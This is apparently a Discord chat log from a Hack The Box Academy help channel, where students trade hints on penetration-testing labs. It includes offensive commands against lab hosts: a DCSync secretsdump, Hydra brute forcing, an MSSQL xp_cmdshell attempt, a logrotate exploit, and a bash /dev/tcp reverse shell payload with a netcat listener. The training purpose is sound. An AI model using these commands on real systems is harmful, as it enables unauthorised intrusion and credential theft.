#modules

thanks. Do you know what the ", 1 space" part is supposed to imply?

there is a space in the answer

why couldn't they just write that. Sometimes I feel like deciphering the text itself is a ctf

😄

Hi there,
in the AD Enum and Attack, I get x user password in the exrcise when I try to get a shell or pass the password to a script like secredump.exe the powershell doesn't take the password.

If I try using rdp to luanch cmd as diffrent user it will work, any idea to make it work in the shell??

could you provide an example? also including error messages would be helpful

so I have the user ||adunn << SyncMaster757 || and it is password.

If I tried to run .\secretsdump.exe -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 it will ask for password if I pass the password it will not work and say:

[*] Cleaning up...```

or if I tried to do `runas /user:adunn cmd.exe` it will ask for password and if I provide it will not work: 
```Attempting to start cmd.exe as user "INLANEFREIGHT\adunn" ...
RUNAS ERROR: Unable to run - cmd.exe
1326: The user name or password is incorrect.

which section is that?

DCSync

smae if I tried to ssh to the linx at 172..225

hey friends , i am at Attacking Common Services - Easy, found user f***, trying to brute force ftp with pwd.list but got nothing , i am trying to do it with rockyou with both f**** and f****@inlanefreight.htb, it needs +500 hours to finish , am i wasting time?

htb-student@172.16.5.225's password:
Permission denied, please try again.```
even when I am just copying and pasting the password

If you are connected via RDP just do it with the GUI, search for "cmd" or "PS" and do "run as another user" so you can actually confirm that the password you are using is correct

manually type out the password. iirc copy paste somehow broke it

manually type out the password. iirc copy paste somehow broke it
well this is it 🙂
I tho I am doing something wrong, thanks!!

this right here should also work

yupp it is confirmed, I should not copy in windows

this right here should also work
this too does work but in shell, I should as you say write stuff down no copy

some services are faster to brute force, some are slower. FTP is decent, but there is a faster one.
Edit: checked notes again, should not make any difference actually. should be fast regardless

let me check it, thanks a lot

Can some one please give me the answer for one of the bahs introduction parts? Ive been writing different scripts for hours and i dont even think its a problem with my script

hello,

Hello, did you succeed.*

I am trying to follow with the DCSync and facing issue running this command any thos:
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

error for context:

Get-DomainUser : The term 'Get-DomainUser' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.``` 

I importd the AD module

I think is PowerView

this one is part of PowerView, so you'll need to import that

my bad, sorry guys!

no worries, I've made that mistake countless times lol

lol, thanks!!

it worked, thanks friend 😊

awesome 🙂

Hi fellows

Is there anyone who have purchased the pro labs subscription?

Aren't there modules for programming skills improvement?

I'm pretty sure there is a python module and bash/powershell stuff

File Upload Attacks - Whitelist Filters section https://academy.hackthebox.com/module/136/section/1289
Can anyone help me with this: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt".
I have uploaded the file but I get a not found response when searching for it.

?

Hi there,
I am facing issue with doing the AD Enum and Attack [Privileged Access] section.
I am connected and I have shell with the user ||adunn|| and trying to execute Get-NetLocalGroupMember -GroupName "Remote Management Users" can't get any answer other than forend so can't solve it

dm you

I think is for which user CanPSRemote privilege and not RDP. Can you please paste the question or confirm than indeed is about the PSRemote privilege?

Module Password Attacks
Section Easy Lab

I am running Hydra for the FTP service. It's been 31 min and no password found.

hashcat -r custom.rule --stdout | awk '!x[$0]++' | tee mutated.password.list # the awk part gets the unique password without changing its order https://stackoverflow.com/questions/11532157/remove-duplicate-lines-without-sorting
hydra -u -L username.list -P mutated.password.list <ip> ftp

Am I doing anything wrong? Should I reset the machine?

Anyone please?

Can you send the academy link? It would help

Sure, https://academy.hackthebox.com/module/136/section/1289

I never did this one, but you probably uploaded a fake image, which is actually a reverse php shell, right? I'd upload a real image, copy the image link with right mouse button, see the path it got uploaded and reproduce with the fake one.

you are sure that are using the correct wordlist?

yep 🤔 it's the one provided in the resources

It takes a very long time

for the not found thing i'm guessing this #modules message

I have done this.
I have uploaded an image e.g shell.png
The image exists on ${link}/shell.png
Then I try one of the character injection attacks where I upload e.g "shell.php/.jpg", which is uploaded successfully (judging by the response message).
When I go to ${link}/shell.php/.jpg, I get a not found error

do not forget that you can face false positives

you have more than 1 list

hmm thanks for the tip, most probably this is the case

and for the section hint use the given bash script but add more or replace some of the extensions

and i recomend you to use -t 64 for be faster

wdym?

hint try without the ||mutated wordlist|| first

In my experience I need to reset the machine because it gets crazy with too many requests, but maybe that was a windows behavior only

@rustic arrow you should be able to find it with the regular user and pass list

No need to use mutated yet

cool, so someone gave me a "bad" hint

so which question are you on?

No success with curl neither.

most likely your extension is wrong because i did that section without using any special character (that you can't access using a browser)

i am having issues with a +0 "pointless" question in "Linux Privilege Escalation" "Environment Enumeration" the question is "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer. " the server that starts does not show the same results as the examples above. specifically the bash history is sent to /dev/null not a file and the example for "find all hidden files" is empty while all of the other examples work as suggested. i don't a zero point question should be this obtuse, am i an idiot missing something basic or is there an issue with the system?

|| grep || is your friend

i dont fully understand the goal but from browsing around on the system and reading the page it seems i am trying to log into lab_adm who has sudo and i am supposed to find a password 'accidentally stored' in a file somewhere? is this the right path?

No, you really just need to find a file that contains the flag.
Flags at HTB usually start with HTB
Try to find files which contain HTB.

thanks that worked i was making it too complex.. from the 'leet' speak in the flag i think maybe another method was intended though

I am currently doing the Cracking Passwords with Hashcat module. On page 12, we were meant to download some zip onto the box - I wasn't sure how to do this, I just curled the download link and I think I got it. However, I am confused about using zip2john with the zip - I tried many different commands and could not get the hash, the command just did nothing. Can anyone give me a hint or help me out on what command I am meant to use for that?

hello im using this crackmapexec smb 10.129.203.10 -u john -p john-secrets SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False) SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\john:john-secrets
and thells me that i can logon but what is the correct pass?

Currently stuck on the Pivoting skills assessment. I know I'm supposed to be uploading some kind of payload to ||webadmin||, but I am not sure how without the password

so which section are you on? (next time just say the section name not the page number in the url)

Cracking Miscellaneous Files & Hashes

if you are in the cme module then i can't help because i haven't done that module but from that example the john user could be a domain user and that domain user could only have smb access

so did you extract the in the file in the Misc_hashes.zip and use 7z2john on that extracted file?

@kindred comet also if 7z2john isn't working then run
sudo apt-get install libcompress-raw-lzma-perl -y

Hi, anyone knows why i cant see the season channels? thx and sorry for using this channels

When i try to exploit host-3 with eternal blue in module shells and payloads it doesn't work someone help

The section is the live engagement

no worries if you specify that at the end but if you are new here read #welcome and #rules after use /verify at #bot-commands and ask that at #1080884182336675872

thanks man

hint there is something different than cred that you can use to login as that user but you can just host a python server on your machine and use wget on the target machine

yeah,
zip2john ~/hashcat.7z\

hint use the exploit module that only let you run 1 command instead of getting a shell

7z2john is for .7z file and zip2john is for .zip file

Can you give me a hint where to import the exploit for host-2

What other user in the domain has CanPSRemote rights to a host?

Tried 7z2john but still does nothing. Also ran the sudo command

So it’s not the same as RDP

nopee

even the second Q is:

Exactly

Now you should be able to figure it out

I am trying right

I can't find any user other than forend

using the Get-NetLocalGroupMember -GroupName "Remote Management Users" and bloodhound

try to use the cypher query with bloodhound

in the "analysis" tab scroll to the bottom "Custom queries" and enter the cypther query provided in the module. You should be able to find the other user

Same thing

I will try to reset the machine

dm me in case you have still problems

This all should be done in the MS01 right with the adunn access

I did collect all the data with the "htb-student" user

Did you figure it out yet? Otherwise I can check it out

No, 7z2john ~/hashcat.7z\ still doesn't work for me

Ok, give me a moment

Thanks

I don’t have that exact module, but I’ll try to help

What extension is the file?

Regular .zip?

it's a 7z

it's inside the zip in the section

so are you getting some type of error with the tool? or does the tool work and you just doesn't get any hash?

Are you using pwnbox?

No error, but it just goes to a new line and does nothing

If so, try “python2.7 /opt/7z2john/7z2john.py <encrypted file>”

I am using the built in virtual environment

I'll try this

Perfect I think it worked

Thank you!

Good stuff 👍🏼

You’re welcome

Just finding what group a user or machine belongs to can be done from any domain connected machine.

As long as you have a domain user credentials

OMG in password attack easy lab after 2 hours to brute force in ftp or ssh using resources list and mutation password or without No log in 😖

Hi everyone. I'm currently working on Linux Fundamentals particularly on Filter Contents and I'm having trouble with the questions. The two ones that I can't seem to understand is the first and the third. For the first, I suppose I need to use netstat -l to get all services that are listening but that's not it. The third, now, curl can't reach the link given (tried on WSL it works, but not on the pwnbox).

Any hint … my goal today finish all lab in Password Attack Module

How to solve this problem: Find a file with the setuid bit set that was not shown in the section command output (full path to the binary).

Which language is better for programming?

If I remember correctly, the username starts with m

http://dontasktoask.com/ which module and secton you in? what is the question you are having issue with? and what did you try?

someone just ask about this you can just scroll up a bit but the hint was don't use the ||mutated wordlist||

I’m brute forcing now I hope login

path:linux privilege escalation
part:Special Permissions
questions:Find a file with the setuid bit set that was not shown in the section command output (full path to the binary).
my way:find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
my question:I don't know which of the displayed contents is the answer(My English is not very good, please understand)

Using Hydra make brutforce with 3 users started with m No Login
using all user in username.list (from res ) No login
all of this with Password.list without mutation No login

no worries if english isn't your first language just don't ask dump stuff without context and that section is kinda dump for beginner because you have to know which binary is or isn't setuid by default

but a tip for that question is first run the first given command in the example on the target box and compare the output of that and the output of the example

Give me a moment

Take ur time

I have found it within 10 seconds

Are you trying to bruteforce ftp or ssh?

Actually I restarted my box twice 😅

Both

What was the command you used for ftp

hydra -L username.list -P password.list ftp://IP

That should work

Make the user list with the m accounts only and let me know

I used -t 48 as well to make it a bit faster

Ok Ill try

Thank you

To be sure 3 users started with m ?

Yes

You can even try them individually

-l name -P password.list

In individual users working now

👍🏼

Thanks for your time bro

You’re welcome👍🏼

I thought this day would never come
https://academy.hackthebox.com/achievement/51013/147
someone pls add dislocker to this module

Good job 👍🏼

#858470491676737536 for suggestions

im trying to get this banner on this excerise but using ncat it wont work. It just says Could not resolve hostname "#": Name or service not known

Any idea what i am doing wrong?

What exactly did you try?

i just put ncat followed by the target ip it gives me

show the command

The exact thing i typed is

"ncat 161.35.32.44:30114"

idk if you meant a picute or not sorry

try ncat 161.35.32.44 30114

that worked! Thanks

So am i not suppose to be the colons there?

nope

different tools have different formats they prefer

always read a tools help page before using it

okay, thanks for the tips

exactly what he said

@thorn urchin when will you start your next try?

probably this weekend but we shall see, theres some things I want to finish up first before I start

I see, good luck! 💪🏼 you got this

Can I DM someone about the pivoting and tunneling skills assessment? I am unsure how to connect to the 2nd machine through my tunnel.

I accidentally spent 500 cubes on whit box pentesting instead of advanced sql injection. Can I refund the cubes? Literally just bought it haven’t done anything yet

dm me

Id contact support

any hint to make privilege in user ||jason|| in password attack-medium lab I used all ideas I learned .. or should be dig more ?

Let me check

anything down for you guys? Can't access the modules on my dashboard anymore

What have you tried so far?

Hint is: check the history

I just managed to solve it again

I really should start taking notes lol, would make it way easier to help

But now I just keep resolving things, which isn’t bad either I guess

Anyone know how to solve "what are the credentials to access the Edge-Router?"

This is last question of credential hunting in windows module

The hint asks me to use Ansible. But I have no idea how this can be used

hahaha me too i want to help but can't remember any of these

did you check non default programs installed? They may rise a "flag"

Git, Crome, Edge, MS Health Tools, MS Visual C++, Mozila, Openoffice 4.1.11, VM tools, WINSCP

None of the relates to networking stuff. I m sorry if i sound dumb

dm you

hey friends, i am at Attacking Common Services - Hard, i tried Impersonate all 3 users, none have sysadmin, so i dont have permission to enable ex-cmd, and when trying execution using linked Server i only get 'testadmin' and null output, tried to get the flag with the execution but didnt work

I would say read one more time the mssql section and I'm sure you will find the answer you're looking for. You're close, just see what left for you that you didn't try yet

anyone elses vpn keep disconnecting?

i tried Read Local Files too but 'You do not have permission to use the bulk load statement'. Capture MSSQL Service Hash : it was 'aaaaaaaaaaaaaaaa' and that's everything mentioned there 😅

i wrote about it at first

ok i will check more about it

oh yeah! Sorry haven't seen it. I guess it's time for me to shutdown

😂 thank you for your hard working 😊

I haven’t done anything. You were close so I though would have been good for you to get back to the material that's all

Hi there, fellas! I need some help with the Blind SQL Injection module, especifically on the Out of band extraction section

hello everyone, I'm stuck with footprinting Medium Lab, I saw a bunch of weird ports

and I'm struggling to figured out how to enumerate correctly

any hint about what is the best route to enumerate correctly this lab?

Hi, may I talk about the resolution of Attacking Common Services - Easy ? I have just finished it and wonder if there is an alternate way to solve it as suggested by the flag name ?

Hi! I am working on "Stack Based Buffer Overflows on Linus" chapter Take control of EIP. I can do the question but don't know what they are actually looking for. Question "Examine the registers and submit the address of EBP as the answer. "

What weird ports?

Dm if you'd like

im on that "Finding Files and Directories" section and used findstr for searching that waldo thing ... how long do i have to wait for that to finish?

Im trying to run an nmap scan to get version of service but when i run the command it says the host seems down, If it is really up, but blocking our ping probes, try -Pn which i did and that told me there was a host up. but nothing else seem to be working (i am using my own VM and am connected to academy vpn)

Exploiting Web Vulnerabilities in Thick-Client Applications. Can i Get some help. I can login with qtc user but cant exploit sql injection

this is very difficult

Can I use my own machine in skills asssessments?

yes

yup, just ensure if a VPN connection is required or not

Can i dm someone about this?

Greetings from 2023 this comment helped me find what I was missing, if you're still around here thanks so much! 😄

resolved after searching forums.

still not able to searc for a file in a win machine i feel sooo stupid im sitting here for over an hour

Can i dm someone about this?

hey guys, Footprinting Medium Lab most be do from the Pwnwd machine?

Not necessarily, any module can be done from your own vm too if you connect to vpn

well is not working from my host

can I DM?

What’s not working?

access/read the NFS folder

ls: cannot open directory 'target-NFS/TechSupport': Permission denied```

Give me a moment, need to spin up vm

ok.

even if I try the command despite in the module

ls: cannot access 'mnt/nfs': No such file or directory``` is not working either....

I most be missing something basic but, can realize what is it

/mnt/nfs

not to be rude but, linux 101 before offsec 🙂

LoL

ls: cannot access '/mnt/nfs': No such file or directory```

well bro

ls /mnt/

it probably doesnt exist

?

did you check the folder you are looking for actually exists first

well, u r right....

Change to root acc

And you should be able to access

I'm just trying to replicate the command despite in the module with the Lab

So sudo su

And then cd to TechSupport

uhm let me see

Just tried it and it worked

ok., it's working

hi I am doing the Getting Started Module's privilege escalation section and I looked and found I cannot run any commands as user2. However I know with this output I should be able to run something as user2:

user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo -l
Matching Defaults entries for user1 on
    ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on
        ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:
    (user2 : user2) NOPASSWD: /bin/bash
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ /bin/bash
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ runuser -l user2 bash
runuser: may not be used by non-root users
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 bash
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 bash' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -u user2 bash
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -u user2 bash' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
<SNIP>

now, can I why?, I guess I know the answer but, I'd to have the right answer....

am I overthinking it?

Su user2?

hey @analog dock can you try and help me with the nmap thing when you have time

What module

-sV -Pn doesn’t work?

sombody please help me with Exploiting Web Vulnerabilities in Thick-Client Applications

i have qtc acces i just cant sql inject

yes I tried that it won't let me execute that command

Have a bit of a hard time reading that copy paste lol

Gimme a moment, I think i have that module

have you tried specifying the whole path like using runuser -l /bin/bash ?

I haven't done the module yet, just thinking out loud

i am on the getting started module and its the service scanning section. I tried that but it says host is down but then i put -Pn and it says there is a host

-Pn will always say theres a host even if there isnt, thats what -Pn is for

its bypassing the automated host discovery checks

Gotcha, i tried running it as sudo nmap -sV for services and it still says host is down or something

sounds like you probably have some sort of connection issue with the lab

or similar

Oh now it works.

Ive been trying for about an hour hoenstly and even reconnected to vpn but it still didnt work till now

sombody please help me with Exploiting Web Vulnerabilities in Thick-Client Applications

i have qtc acces i just cant sql inject

happens sometimes

Yeah its a little frustrating

you just have to follow the instructions exactly

99% of the issues is cause ya skipped a step on accident

aquatone order the reports by most importants as well?

i learned after 2 hours googling and trying that you connect to the powershel via ssh and cmd comands dont work there ...

Sudo -u

user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c NOPASSWD
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c /bin/NOPASSWD
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c /bin/NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c /bin/bash/NOPASSWD
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c /bin/bash/NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -u user2 -c /bin/bash/NOPASSWD
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -u user2 -c /bin/bash/NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -u user2 -c NOPASSWD
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -u user2 -c NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
<SNIP>

user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c "sudo -u"
[sudo] password for user1: 
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c sudo -u' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ 

lmao

Read what sudo -l says

sending the sudo -l

would be more useful

You’re allowed to run /bin/bash as user2

Without password

I gave you the command, you just have to fill it in now

he is persistent

There’s no runuser needed

really guys doing linux 101 will go a long way

i promise

trying 1 hundred times the same commands he will get something different

the longest is active directory enumeration and attacks

i cant imagine jumping directly into htb without knowing basic terminal

yeah i just failed my first PNPT attempt

Keep learning

and try again

@quasi wave did you get it?

i spent the first 3 out of the 5 days for the attempt
losing my mind on a bruteforce
because i didnt grep extract in burp and the response length [on success] was 342 instead of all the failed attempt 343s

not yet

this is hard

It’s also shown in the cheatsheet

ok

found it thanks

All you need to do is change the user and change /bin/echo to what you are allowed to run

I was overthinking it

Yeah you were lol

Good job 👍🏼

can u send the sudo -l?

normally just searching it in gtfobins is enough

@analog dock in what module are u now?

the pivoting one

no I found it now I'm doing second question

Anyone able to give me a nudge on AD Enumeration & Attacks: Assessment Pt 2? I'm up to 3rd last question. I've got admin on MS01 with the m## user and am trying to find the creds for the c## user, but have hit a brick wall.

ooof funny skill assessments

Oh boy

u got the flag of the question 3?

yeah, you up to that part?

I'm having trouble with second question. I'm logged in as user2 and it won't let me use sudo -l

why?

it let me when I was user1

if the output is something like "User has no sudo privileges" then you have your answer

it doesn't have that output

its requiring user2's password but I didn't get user2's password in order to log in as user2

are u in the ms01?

I can't access shadow file

What module?

yeah i got admin on MS01

but I can access passwd file but that obviously doesn't help

privilege escalation section of getting started module

then read the section again

Then passwd isn't needed

ok cool

The section is super informative

Any common attack u know?

to get creds there

hmmm... I've tried the usual mimikatz modules and snaffler/lazagne... I'll poke around a little more

reading the section names should be enough

to know which are common attacks/enumeration

I see

There’s no passwd or shadow file needed to escalate privileges there

What you need is shown in the section

ssh-keygen?

Well you don’t need to generate them

You can find the keys you need as user2

wait ok but they are not letting me use the keys I generated back as user1

I can't add them to file

no permissions

You don’t need to generate keys

You don't need to generate keys

Ive rechecked everything and i havnt skipped a step

ok hold on

You need to find keys in the system

didn't u even tell the solution here

That was for question 1

He needs to get root now

can someone help me with CrackMapExec: Skill Assessment ?

||ls -la|| maybe?

That would show him the directory he needs if he gets to the map before that

https://dontasktoask.com/

I'm looking in root folder. am I looking in wrong place? I looked at bash_history file and that didn't help

Root folder is good

ok

But we were talking about what you needed

Keys

So in what folder do you find that?

It’s shown in the section

the only section I am thinking of says its in .ssh folde

.ssh folder has keys

then the next step is for me to use SSH?

Correct

Use those keys to ssh to root

CrackMapExec: Skill Assessment , i have been trying to get initial credentials for 1st question, i followed what the hint says but no results (about NULL Authentication) and tired every possible variation, and tried using the IPs and VHosts as well, yet no results and the question is "What's the password of the account you found? " so I must use --users

yet nothing so far

I am doing it but its not letting me in:

user2@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/root/.ssh$ ssh root@209.97.176.220 -i id_rsa

^C
user2@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/root/.ssh$ ssh root@209.97.176.220 -i id_rsa -p 30243

I also tried it with localhost and 127.0.0.1 and it didn't help

Because you’re doing it from the box

oh I see

You need to do it from your vm

ok hold on

Well you can do it from pwnbox, just not from user2

can u send the link?

I get this error Error enumerating domain users using dc ip xx.xx.xx: NTLM needs domain\username and a password and the hint indicates to use null authintication

https://academy.hackthebox.com/module/84/section/1747

then use null authentication to enumerate

i havent unlocked it sorry

i did use it, but i get errors

what command u using

┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i authorized_keys -p 30243
Warning: Identity file authorized_keys not accessible: No such file or directory.
ssh: connect to host 209.97.176.220 port 30243: Connection refused
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i id_rsa -p 30243
Warning: Identity file id_rsa not accessible: No such file or directory.
ssh: connect to host 209.97.176.220 port 30243: Connection refused
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i id_rsa
Warning: Identity file id_rsa not accessible: No such file or directory.
^[[A^C
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i authorized_keys
Warning: Identity file authorized_keys not accessible: No such file or directory.

lmao I'm doing that from my VM and its not letting me in

proxychains -q crackmapexec smb dc01.inlanefreight.local -u '' -p '' --users

i have tried many variation of it the command

Did you copy the id_rsa to your host?

And did you give it the right permissions?

found it 🫠 I swear i already spun up that tool before... but it must've just been when I was faffing about on SQL01... spending hours on this stuff, it all bleeds together lol

try -N maybe?

hold on ok

I got locked out gotta log back in

ok I'm back in root folder

@quasi wave got it?

hold on

I did it

U just writing a ssh key

I know I got in

a well he deleted it

I'm logged in as root

challenge completed

thank you

Good

You’re welcome 👍🏼

YES!! AD Enum & Attacks is finally done... man that module took some time.

Just finished public exploits section in the getting started module and it feels so rewarding completing the exercise

Anyone able to get the MASS IDOR ENUMERATION script working?

I can't figure out how to get the script workling

Someone @ me if anyone gets the script given in MASS IDOR ENUMERATION working I just used intruder so 🙂

More of a general question here. When answering academy questions, I often have to search through forums to find clues on which tools to use or options to consider.

Often, the way to the solution is a method I never knew about or considered. This is a normal part of the process or am I cheating myself looking outside the module for breadcrumbs?

Would anyone be able to assist me in completing the "Whitelist Filters" section in File Upload attacks

I've honestly been stuck on this section for a long time

Tough question, I'm definitely in somewhat of the same boat. Sometimes, I like this MASS IDOR ENUM I had no idea how to do it the intended way. Finding non-intended ways to do something isn't bad, but it can be beneficial to find the intended way after.

Dm if you'd like

tysm. il send something over now

why lab on HTB academy is super slow =,=

50% because if your internet speed and the lab physical location (in the UK the last time i check) and 50% because of sometime the academy lab suck ass

some question on some section could be straight out dumb or the only way to get the answer is through the hint but generally you can solve most of the question with the given info on the section and of course sometime you need to do additional research about a topic (not looking for hint on forum 🤣 )

if you are still having issue with the script hint just make it send ||POST|| request instead

If i want to learn assembly 64_x86 specifically for windows development will the assembly module in htb fit for me? Because i read that the module is built on linux fundamental knowledge, and because assembly is cpu-dependent i am not aure

*sure

There is a problem with the machines when I ping the machine it doesn't respond. I tried to fix it and it didn't work. Also even the walkthrough says to ping

Once I got the hash here (Cracking Passwords with Hashcat -> Cracking Miscellaneous Files & Hashes), a long hash starting with $7z, I tried running hashcat -m 11600 $7z... /usr/share/wordlists/rockyou.txt, but it says "Separator unmatched" & "No hashes loaded." I tried googling it to understand and trying different things to validate the hash, but I don't seem to be getting anywhere with it. The section doesn't say anything about this, does anyone have any insight?

anyone done with Logrotate on Linux Privilege Escalation? idk why but I can't even seem to find the logrotate.conf file, it doesnt seem to be in the /etc directory, and i tried searching for all files in all directories for the logrotate.conf, but I still can't find it 😦

Haven't done this section yet but if its a dot file it could be .logrotate.conf

I have not found the file either, but I have completed the section

Have a look at the user directory.
You should find answers there

hey friends, i am at Attacking Common Services - Hard, i tried Impersonate all 3 users, none have sysadmin, so i dont have permission to enable ex-cmd, and when trying execution using linked Server i only get 'testadmin' and null output, tried to get the flag with the execution but didnt work

managed to solve it after googling, turns out its similar to a htb retired machine. could i ask you a question? ||why does writing to the file trigger the logrotate, how do we determine this is how the rotate occurs without a .conf file to refer to?|| i only know this because i read the writeup for the retired machine

or to be more specific, i don't get it how to enable xp_cmdshell with the EXECUTE command, i think this might be the goal

Logrotate ensures that log files do not become too large.
When exactly they rotate is in the configuration file.

If you look at the files in the user directory, you will see that there is only a single entry in the log file that was saved. That means, after an entry the logfile is obviously rotated.

Did you show the linked servers?

oh i see! so the limitation on size is what made the rotate occur. thank you for the help 🙂

Why not try this server? 😉

Does anyone know what does the error refer to here?

try to remove the colon

nvm didn't saw th whole error

You probably just copied the command out.

i dont get it, i am already trying it 😂

Thank you sir

but there is no output

i am just not sure what type of command to put in the EXECUTION command, is it sql commands or cmd

should i be trying something like this? : EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''EXECUTE sp_configure "show advanced options", 1;GO;RECONFIGURE;GO;EXECUTE sp_configure "xp_cmdshell", 1;GO;RECONFIGURE;GO'')') AT [LOCAL.TEST.LINKED.SRV]

Try to impersonate a user with admin rights and then query the linked server

Anyone able to help me on the pivot skills assessment? I’m rdp into the ml user, and managed to get the .dmp file, but I’m unsure how I can transfer it to pwnbox

with xfreerdp you can mount a drive so you can easily copy data back and forth.

/drive:<NAME>,<PATH>

can't get no root ./logrotten -p ./payload /tmp/tmp.log
Waiting for rotating /tmp/tmp.log...
module :LINUX PRIVILEGE ESCALATION Content :Logrotate

Could I get help with Active Directory Enumeration & Attacks? I am stuck on the skills assessment Pt. 1, Q4 . I cannot pivot to MS01. I am able to access WEB-WIN01 with evil-winrm, psexec, and the webshell, but trying to move to MS01 via a PSSession has failed, and I can't connect directly from my own machine as MS01 is on a separate network. I have tried to use reverse ssh dynamic port forwarding and proxy chains, but that failed with evil-winrm since I cant get the prompt to show up where I can type in my password, and psexec is using cmd.exe and trying to elevate to powershell loses the full interactivity. not sure what else i could try.

Edit: I am able to use psexec to get onto MS01 with enter-pssession but then i have 0 interactity and can't see the output of any of my commands

Pay attention to the path to the log file

Thank you!

i gave the right path of the log file it's not giving any reverse connection

!

Not sure if it is the best way, but i used net use to mount the remote folder on that one

Did you also write an entry in the log file so that the log file is rotated?

yes sir

Waiting for rotating

Which log file did you use?

the on which was already there as default in the htb-user :htb-student@ubuntu:~/backups$ ls
access.log

am idoing smth wrong

Yes probably, because it should work with that

./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...

u saind smth about entry

what kind of entry i should've added is it smth specific or any random thing ?

you can refer to what i asked @acoustic owl earlier, that might help you

am still stuck

try googling for a walkthrough on hackthebox machine 'Book'

./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...

it's still stuck

Now write something in the log file. Does it rotate then?

Nice

Skills assessment was pretty nice

Gl in AD)

Thank you, I’m not too familiar with ad so that will be challenging

just finished that yesterday, was an insane learning experience. all the best!

Sheesh, module says 7 days lol

That will be fun

hello i need help on last question of SHELLS & PAYLOADS: The Live Engagement

Then try "Introduction to AD"

echo node >> ./backups/access.log
htb-student@ubuntu:~$ ./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...

If I feel like I need it, I will

Log in with two terminals.
In one you write the command for logrotate, in the other you write an entry into the logfile

The Penetration Tester Path assumes knowledge of the Information Security Foundations Path

echo givemeflagbitch >> ./backups/access.log

htb-student@ubuntu:~$ ./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
Renamed ./backups with ./backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
htb-student@ubuntu:~$ ls
backups backups2 logrotten payload super.c
htb-student@ubuntu:~$ nc -nlvp 9001
Listening on 0.0.0.0 9001

maybe you need to look at the module content again... your reverse shell listener isn't set up properly

u mean the payload

cat payload
bash -i >& /dev/tcp/10.129.204.41/9001 0>&1

